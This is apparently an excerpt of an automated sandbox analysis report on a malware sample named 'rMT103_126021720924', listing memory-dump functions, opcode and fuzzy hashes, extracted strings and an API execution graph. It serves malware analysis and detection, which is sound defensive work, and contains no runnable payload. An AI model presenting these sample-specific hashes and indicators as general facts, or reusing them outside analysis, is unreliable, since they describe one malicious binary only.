                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 043aa0b8d16826b8f73da41f1fe7e198e55dd8de25112c018048560b6385ca46
                                                    • Instruction ID: 6b1146430fe6afe299b88488240e1615d8f730fd0a2998e07c7db04e141b559e
                                                    • Opcode Fuzzy Hash: 043aa0b8d16826b8f73da41f1fe7e198e55dd8de25112c018048560b6385ca46
                                                    • Instruction Fuzzy Hash: B121AC75F002159FDF40DFA9D980AAEBBF1AB88314F04802AEA05EB384E735D901CB95
                                                    Function 0292D030 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4170794310.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_292d000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8ea0055c4840d23b921b6cf25ab744c8f4fa9038446d5812e9ff0816e5c56e08
                                                    • Instruction ID: 1233a4efadcfee6a881fdfc1cee3452abb622ebe1333cf027f5186f16ae8d764
                                                    • Opcode Fuzzy Hash: 8ea0055c4840d23b921b6cf25ab744c8f4fa9038446d5812e9ff0816e5c56e08
                                                    • Instruction Fuzzy Hash: 97212671544204DFDB14DF14D9C0B26BBA5FB88314F24CA6DD94A4B2AAC33AD84BCA72
                                                    Function 0292D1F8 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4170794310.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_292d000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4945dbe0f53ed24bf9f2cda73dca31cb18d100ab6d008911eefadc4821499c0
                                                    • Instruction ID: d4c58341714a5169cb5151b588adf3ea4a5b88b1241ca653803aaa2825c07290
                                                    • Opcode Fuzzy Hash: f4945dbe0f53ed24bf9f2cda73dca31cb18d100ab6d008911eefadc4821499c0
                                                    • Instruction Fuzzy Hash: 262105B1504244DFDB15DF14D9C4B2ABBA9FB84324F24C969E8494B24AC37AE44ACAB1
                                                    Function 0292D3A8 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4170794310.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_292d000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cbdab2be85ebd51e94146300f8db89661fdab4abae92719bb4817fae905f99fb
                                                    • Instruction ID: d663b2834b7e2e8f3e160e33efb1adbe4a107696ef8f56ca351420beb09bde7b
                                                    • Opcode Fuzzy Hash: cbdab2be85ebd51e94146300f8db89661fdab4abae92719bb4817fae905f99fb
                                                    • Instruction Fuzzy Hash: B421F9B5504244DFDB08DF14DAC4B26BB69FB84318F24C96DD90D4B29AC376E44ACB71
                                                    Function 0292D006 Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4170794310.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_292d000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 86a32e9278ec2113dffe92c18b8927ed74919661ca38c76a35f5241b55598f86
                                                    • Instruction ID: 51c34e3bde0cd0898e2dae404ff9f984008de1c072ef30b6133174bd5997e0f2
                                                    • Opcode Fuzzy Hash: 86a32e9278ec2113dffe92c18b8927ed74919661ca38c76a35f5241b55598f86
                                                    • Instruction Fuzzy Hash: D721487114D3C09FCB078B24D990715BF75EB46214F29C5EBD8898F2A7C33A980ACB62
                                                    Function 0292D118 Relevance: .1, Instructions: 71COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4170794310.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_292d000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7c09c94b2f9a74985749ab27ce6270960c4a4e086f4d97024375bdcc197aa4e3
                                                    • Instruction ID: adb0c9b9d4313356fc9fbd9b16e9e5654adca9dd7fc0962729ba4188f4845761
                                                    • Opcode Fuzzy Hash: 7c09c94b2f9a74985749ab27ce6270960c4a4e086f4d97024375bdcc197aa4e3
                                                    • Instruction Fuzzy Hash: FE21D471644264DFDB08DF14D9C4B26BFA9FB88318F20C56DD8094B69AC336D84AC671
                                                    Function 068640D8 Relevance: .1, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 692567c38130f4d6bb24b1e7eaf7dc92eecf9cc0211ee0fe82f11b0d10bfd9ed
                                                    • Instruction ID: db4175dbd09e63d2c6065b168d15efc5eacd9c9bdb6d67585acdcb77660e6397
                                                    • Opcode Fuzzy Hash: 692567c38130f4d6bb24b1e7eaf7dc92eecf9cc0211ee0fe82f11b0d10bfd9ed
                                                    • Instruction Fuzzy Hash: CD118431B101299FDF949669CC14AAF73EAEBC8314F04853AE90AE7344DE75DD028BD2
                                                    Function 0686F2B0 Relevance: .1, Instructions: 57COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5ccb9d04197cddce8d9f232c881e87e6d3d3f5ea8f2a5c5baeff51b13e13a33
                                                    • Instruction ID: 6ae3481fc78dca06358fab327a6bbfd0c217174c2a1b704c607ad1cab0faf7c5
                                                    • Opcode Fuzzy Hash: b5ccb9d04197cddce8d9f232c881e87e6d3d3f5ea8f2a5c5baeff51b13e13a33
                                                    • Instruction Fuzzy Hash: 2301F531B041900FCBA2827EA9547BE6BD7DBCA720F14886EF60AC7340DA15CC038B96
                                                    Function 06864310 Relevance: .1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2d5cbc7d18a27fd035796793c000405099e7f7ee9859b1883ea7e454e507488c
                                                    • Instruction ID: 4fdfc1f227472b68c76514f90f20d111be960064860f7a34bb1f4f576a2510d0
                                                    • Opcode Fuzzy Hash: 2d5cbc7d18a27fd035796793c000405099e7f7ee9859b1883ea7e454e507488c
                                                    • Instruction Fuzzy Hash: 2501D431B100100BDB649A7EE944B5FB7DADBCA724F24853DF60AC7390EE25DC024395
                                                    Function 0292D1F3 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4170794310.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_292d000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                    • Instruction ID: 92cf03f6b739fd3b8cef837d2f8593bd8f08091fcab5de6305e14a3dfd259cd1
                                                    • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                    • Instruction Fuzzy Hash: 0211BF76504280CFDB12CF14D5C4B56FF71FB84324F24C6AAD8494B65AC33AD40ACBA2
                                                    Function 0292D3A3 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4170794310.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_292d000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                    • Instruction ID: f1f6b329fdc4d614c4410896b8e3dcbd04359a7c0fc922206b3d637dd0de0473
                                                    • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                    • Instruction Fuzzy Hash: 3A119D75504280DFDB05CF14D5C4B15BFA2FB84318F24C6AED94D4B6AAC33AE44ACBA2
                                                    Function 06863D92 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d46bba1b38e583ef002a2a65ae69e32f06e20ce8c3a3a7461691e2b3271adf21
                                                    • Instruction ID: 43e2579578d3a96320bfefead5c8f9af9d3aaeb885086b2a4e1bac8483f812e5
                                                    • Opcode Fuzzy Hash: d46bba1b38e583ef002a2a65ae69e32f06e20ce8c3a3a7461691e2b3271adf21
                                                    • Instruction Fuzzy Hash: 1A21C2B1D01259AFCB00DF9AD885ACEFBF4FB49314F10812AE918A7200C374A954CFA5
                                                    Function 06863578 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be683ac287586853ea1a4d5d1a6f52f7aae2dc2bccfe065e88da8d4c5831f63e
                                                    • Instruction ID: ae08a42606b202de6531de604a393b483e5634da790e5780ddd710cf5b58a5ff
                                                    • Opcode Fuzzy Hash: be683ac287586853ea1a4d5d1a6f52f7aae2dc2bccfe065e88da8d4c5831f63e
                                                    • Instruction Fuzzy Hash: 48016171E002189BDB54DB7AD8455DEF7B5EB89310F109569E509E7200EE31DA41CF91
                                                    Function 0292D113 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4170794310.000000000292D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0292D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_292d000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                                    • Instruction ID: 45edb87fd1bc3aba70a918b4cff9f749b0cbe21d3154257ee3e6f39d63d6da7f
                                                    • Opcode Fuzzy Hash: e676ac0fa395c9d78ad1373b251d500d35a058fc48d93c8ca3093ca1b2890539
                                                    • Instruction Fuzzy Hash: 5D119D75504284CFDB09CF14D9C4B15BFB2FB88318F24C6ADD8494BA96C33AD44ACB62
                                                    Function 06863D98 Relevance: .1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4974326de6ec5253b4243bf60f27523e82efb163dd67b1a8d07dab415c7a61f5
                                                    • Instruction ID: 1f0667ad330a96f64ca18d9ebeb715b6fe8d67b9c6786b1a78f6352944230ccb
                                                    • Opcode Fuzzy Hash: 4974326de6ec5253b4243bf60f27523e82efb163dd67b1a8d07dab415c7a61f5
                                                    • Instruction Fuzzy Hash: 4711D3B1D012599FCB00DF9AD884ACEFBF4FB48314F10812AE918B7200C374A954CFA5
                                                    Function 06864320 Relevance: .1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d4318a26a7815bccebd8ec09a9e122a43b9ef099f4f4e554d0214d39ef96dadc
                                                    • Instruction ID: 44771e5a4f4cb979859e0ef796772dc30f5e02aa69424c7d7ce360fd3c6fb3de
                                                    • Opcode Fuzzy Hash: d4318a26a7815bccebd8ec09a9e122a43b9ef099f4f4e554d0214d39ef96dadc
                                                    • Instruction Fuzzy Hash: 0501FF30B100100BEB64997EA954B6FB3DADBCA724F20C83AF60EC7380EE65DC024395
                                                    Function 0686F2C0 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a6066d183471e2e563fe0279c8033fff8bc0b7400e8953039b03108365d2037
                                                    • Instruction ID: 92927cb2ad759b40074b3dc763df1a5048f49825e2ff1eda32918e529f7f597c
                                                    • Opcode Fuzzy Hash: 4a6066d183471e2e563fe0279c8033fff8bc0b7400e8953039b03108365d2037
                                                    • Instruction Fuzzy Hash: 1A018C31B004141BCB6596BEAA5072EB2DBDBCA720F248839F60AC7340EA25DC034B86
                                                    Function 068640C9 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35b4b6fbf242d1e666d0b269433cbc1f5235d31f49bf07ad2ba3878ad85eec5c
                                                    • Instruction ID: c68fb777d4e4d0c563c9ed134eba454f29314cfe7145340b7ad6a90580c90b95
                                                    • Opcode Fuzzy Hash: 35b4b6fbf242d1e666d0b269433cbc1f5235d31f49bf07ad2ba3878ad85eec5c
                                                    • Instruction Fuzzy Hash: FF01A236F100245BEF949669DD247EF73EA9BC8214F048036E60AD7344EE649D0287D2
                                                    Function 0686A428 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9365b3e48592e5b95b33c64114ec2efa4649895880d606a43cc7dc82839438bc
                                                    • Instruction ID: cc5a715bbfc56bd77a2f0672e25481f79c297c42c0f5cc2e2078824bbbef09bb
                                                    • Opcode Fuzzy Hash: 9365b3e48592e5b95b33c64114ec2efa4649895880d606a43cc7dc82839438bc
                                                    • Instruction Fuzzy Hash: 1001D130B100144FDB65EA7ED85872E73D6DB89724F108939F60ED7358EE21EC028785
                                                    Function 0686FCC1 Relevance: .0, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 88ab1f581589dcf28c14a0ad2e3d0cb63372cae86ec5d2c60a89e147f0368881
                                                    • Instruction ID: a533e6690c442ebb555be3da6b270e28bd82124c621c8d6d6539139913837ea2
                                                    • Opcode Fuzzy Hash: 88ab1f581589dcf28c14a0ad2e3d0cb63372cae86ec5d2c60a89e147f0368881
                                                    • Instruction Fuzzy Hash: 99019E34A012149FDB64DFB5E959BAE7BB3AB48311F104929F616E73A0CB309C04CB80
                                                    Function 0686C900 Relevance: .0, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 19e3b55b40247237fc877334a4ae652a3d7760c68f7575164223ffb78eddff34
                                                    • Instruction ID: 7340713c10fc2ea82a9a51959908a3b507d786ea395517acc30555fa6a59ce95
                                                    • Opcode Fuzzy Hash: 19e3b55b40247237fc877334a4ae652a3d7760c68f7575164223ffb78eddff34
                                                    • Instruction Fuzzy Hash: 8101C831F202289FCB649A7AE940A9EB776FB85358F104539F905E7344DB31E805CBD4
                                                    Function 06866580 Relevance: .0, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e9b5b334a789c546f313afc537dfd05f1ccefd011cd1139228df353db1ee117
                                                    • Instruction ID: 38bb55fca16639e17c5cbda8524544901a8efd549b93567611b1c19cffa7eac3
                                                    • Opcode Fuzzy Hash: 5e9b5b334a789c546f313afc537dfd05f1ccefd011cd1139228df353db1ee117
                                                    • Instruction Fuzzy Hash: D6E0D8B1D151849FDFA0DFB0CA5E39E77A59B02204F204DE6E808C710AF136CE414742
                                                    Function 06866590 Relevance: .0, Instructions: 22COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bbdc51fb53645a6523892bb5479baa6c78d81e1bc7dcc723c2926803fef69f91
                                                    • Instruction ID: 9af4fdbd21febbbb4097e9cdce36932907cfd7874793bad7719af90416b67948
                                                    • Opcode Fuzzy Hash: bbdc51fb53645a6523892bb5479baa6c78d81e1bc7dcc723c2926803fef69f91
                                                    • Instruction Fuzzy Hash: 40E0C270E10148ABDFA0DEB6C94E75F73ADD701204F2088A5F508C7206F233DE414782

                                                    Non-executed Functions

                                                    Function 068677B0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-2222239885
                                                    • Opcode ID: 9bd040ce5d979a8f0df9a9adbac1be877cae3a1d5a1b328ba5de6f09ca9810bb
                                                    • Instruction ID: b05627c1aa4c6cf355a44344418b960ebce606a15a6d5b82186cc36ff4b31b3e
                                                    • Opcode Fuzzy Hash: 9bd040ce5d979a8f0df9a9adbac1be877cae3a1d5a1b328ba5de6f09ca9810bb
                                                    • Instruction Fuzzy Hash: C5120E30E002198FDB64DF65D954AAEB7F2BF85708F2089A9D509EB354DB309D85CF81
                                                    Function 0686AA48 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-3823777903
                                                    • Opcode ID: 682b1d3b84521bfc40c18462805fe36b91be252775473323076c04fdbbf265b3
                                                    • Instruction ID: dd7f3310d69daf59a4a9a7356a389eaa54a66b7ae074c84bcce59ee992ab0bf7
                                                    • Opcode Fuzzy Hash: 682b1d3b84521bfc40c18462805fe36b91be252775473323076c04fdbbf265b3
                                                    • Instruction Fuzzy Hash: 40915C30E0020D9FDB68EF66D645BAEBBF2BF84305F108529E502EB294DB759D45CB90
                                                    Function 068671B0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-390881366
                                                    • Opcode ID: 6a34c83a31ac89383cd06e53ede5fa79ac358a29355ac7a20d6d679fe190dea0
                                                    • Instruction ID: 609640a5a4bbe326c8ab2050137e824ac424aad061dbf04df3d3f2ebc4ad34f7
                                                    • Opcode Fuzzy Hash: 6a34c83a31ac89383cd06e53ede5fa79ac358a29355ac7a20d6d679fe190dea0
                                                    • Instruction Fuzzy Hash: 3FF11B30A01208CFDB59EB69D654A6EB7B3FF84308F248569D405DB768DB35EC86CB81
                                                    Function 0686BB28 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                    • API String ID: 0-2392861976
                                                    • Opcode ID: e633a8c524a191893b77d7fc1a664ec10a88d553be5136b4940b78e406dfebfa
                                                    • Instruction ID: 4219b692d7979d7c29039da1c5f529be27c67d180100ea6f6bc3d3f26e218438
                                                    • Opcode Fuzzy Hash: e633a8c524a191893b77d7fc1a664ec10a88d553be5136b4940b78e406dfebfa
                                                    • Instruction Fuzzy Hash: 3571BB31E002098FDB68DFAAD9406ADB7F2FF85308B10846AE506DF254EB71ED55CB81
                                                    Function 068684E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q
                                                    • API String ID: 0-2125118731
                                                    • Opcode ID: 0c03f7382233ee18edaa541abdacb2320188b4e6fcfe359f9e5b2e010666cd95
                                                    • Instruction ID: cf03dc03aa8dd1f9a80de20df358105fecaf4dedad1dfb96cd7ff6b37142ed6a
                                                    • Opcode Fuzzy Hash: 0c03f7382233ee18edaa541abdacb2320188b4e6fcfe359f9e5b2e010666cd95
                                                    • Instruction Fuzzy Hash: B9B13C70E002088FDB54EF69D5946AEB7B3EF84304F248929E50ADB364DB75DC86CB91
                                                    Function 0686ADD0 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $^q$$^q$$^q$$^q
                                                    • API String ID: 0-2125118731
                                                    • Opcode ID: e7d44a21d9e4457bdeb567e5a2ce7ef28f4d218f422cc1c805379122ecec138c
                                                    • Instruction ID: 00cef2f9e624601d6c7dbe2e2bbbca684988605a5e6e96f77dbae014a7f4ce5b
                                                    • Opcode Fuzzy Hash: e7d44a21d9e4457bdeb567e5a2ce7ef28f4d218f422cc1c805379122ecec138c
                                                    • Instruction Fuzzy Hash: FE51A170E102058FDF69DB65D580AAEB7B2EF84314F14856AF505EB354DB31DC41CB92
                                                    Function 06868900 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.4189038696.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_6860000_rMT103_126021720924.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LR^q$LR^q$$^q$$^q
                                                    • API String ID: 0-2454687669
                                                    • Opcode ID: 5e295a24bbe43c9cbcab553a1b3a1634b030593ad879bc97827f01b9de3c27f1
                                                    • Instruction ID: aeccae865a95c1777977788ec2d36360eacfcddded4ea94a8a609796a33682e9
                                                    • Opcode Fuzzy Hash: 5e295a24bbe43c9cbcab553a1b3a1634b030593ad879bc97827f01b9de3c27f1
                                                    • Instruction Fuzzy Hash: 4051A170B002058FDB58EB29D954A6EB7F2FF84308F148A69E509DF395DA30EC40CBA1

                                                    Execution Graph

                                                    Execution Coverage:7.1%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:38
                                                    Total number of Limit Nodes:3
                                                    execution_graph 30259 7c02310 30260 7c02336 30259->30260 30261 7c0249b 30259->30261 30260->30261 30263 7c014a4 30260->30263 30264 7c02998 PostMessageW 30263->30264 30265 7c02a04 30264->30265 30265->30260 30266 18d4668 30267 18d467f 30266->30267 30268 18d468b 30267->30268 30270 18d4798 30267->30270 30271 18d47bd 30270->30271 30275 18d4898 30271->30275 30279 18d48a8 30271->30279 30276 18d48a8 30275->30276 30277 18d49ac 30276->30277 30283 18d4508 30276->30283 30280 18d48cf 30279->30280 30281 18d4508 CreateActCtxA 30280->30281 30282 18d49ac 30280->30282 30281->30282 30284 18d5938 CreateActCtxA 30283->30284 30286 18d59fb 30284->30286 30245 18dd540 30246 18dd586 30245->30246 30250 18dd70f 30246->30250 30253 18dd720 30246->30253 30247 18dd673 30256 18dd2b8 30250->30256 30254 18dd74e 30253->30254 30255 18dd2b8 DuplicateHandle 30253->30255 30254->30247 30255->30254 30257 18dd788 DuplicateHandle 30256->30257 30258 18dd74e 30257->30258 30258->30247 30287 18db1b0 30290 18db298 30287->30290 30288 18db1bf 30291 18db2dc 30290->30291 30292 18db2b9 30290->30292 30291->30288 30292->30291 30293 18db4e0 GetModuleHandleW 30292->30293 30294 18db50d 30293->30294 30294->30288

                                                    Executed Functions

